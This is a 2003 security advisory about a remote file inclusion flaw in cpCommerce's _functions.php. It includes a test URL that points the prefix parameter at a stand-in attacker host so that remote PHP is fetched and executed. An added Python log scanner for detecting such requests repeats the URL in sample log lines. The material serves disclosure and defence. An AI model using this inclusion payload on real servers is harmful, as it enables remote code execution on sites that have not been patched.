[UNIX] File Inclusion Vulnerability in cpCommerce
From: SecuriTeam (support_at_securiteam.com)
Date: 10/19/03
To: list@securiteam.com Date: 19 Oct 2003 14:30:46 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
File Inclusion Vulnerability in cpCommerce
------------------------------------------------------------------------
SUMMARY
cpCommerce (http://www.cpcommerce.org/) is "an open-source e-commerce
solution that is entirely template and module based". A vulnerability in
the product allows remote attackers to cause the product to include
arbitrary PHP files and execute them.
DETAILS
There is a file inclusion vulnerability in the _functions.php file, lines
13-14:
require_once("{$prefix}_config.php");
require_once("{$prefix}_gateways.php");
The value of $prefix can be supplied in the request URL, so it is possible
for a remote attacker to include an external file and execute arbitrary
commands with the privileges of the web server (nobody by default).
To test the vulnerability try this:
http://www.vulnsite.com/path_of_cpcommerce/_functions.php?prefix=http://www.attacker.com/index
In this way, the file "http://www.attacker.com/index_config.php" or
"http://www.attacker.com/index_gateways.php" will be included and executed
on the server.
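For detection, the following added example (not part of the original advisory or of cpCommerce) scans web server access logs for requests to _functions.php whose prefix parameter points at a remote resource, including percent-encoded variants. The log lines are constructed samples, and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request line inside a Common/Combined Log Format entry.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Value that starts with a URL scheme ("http:", "ftp:", ...) or "//host".
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]*:|//)', re.IGNORECASE)

def decode_fully(value, rounds=3):
    """Undo repeated percent-encoding (e.g. %2568ttp), up to a bound."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_prefix(log_line):
    """Return the decoded 'prefix' value when the request targets
    _functions.php with a prefix naming a remote resource, else None."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not decode_fully(url.path).lower().endswith("/_functions.php"):
        return None
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name == "prefix":
            value = decode_fully(value)
            if REMOTE_RE.match(value):
                return value
    return None

def scan(lines):
    """Return (client address, decoded prefix) for every flagged line."""
    return [(ln.split()[0], hit) for ln in lines if (hit := suspicious_prefix(ln))]

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [19/Oct/2003:14:31:02 +0200] "GET /shop/_functions.php?prefix=http://www.attacker.com/index HTTP/1.0" 200 512',
    '192.0.2.11 - - [19/Oct/2003:14:32:10 +0200] "GET /shop/_functions.php?prefix=%68ttp%3A%2F%2Fexample.invalid%2Fx HTTP/1.1" 200 512',
    '192.0.2.12 - - [19/Oct/2003:14:33:00 +0200] "GET /shop/index.php?page=cart HTTP/1.1" 200 2048',
    '192.0.2.13 - - [19/Oct/2003:14:34:00 +0200] "GET /shop/_functions.php HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for client, prefix in scan(SAMPLE_LOG):
        print(f"{client} requested remote include via prefix={prefix}")
```

Access logs normally record only the query string, so a prefix value sent in a POST body or cookie would not appear in them.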
Solution:
The author has been contacted and has published a temporary fix in the
cpCommerce website forum, pending the release of a new version.
The patch is available here:
http://cpcommerce.org/forums/index.php?board=2;action=display;threadid=864
ADDITIONAL INFORMATION
The original advisory can be downloaded from:
http://www.zone-h.org/en/advisories/read/id=3284/
The information has been provided by Astharot (astharot@zone-h.org).
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.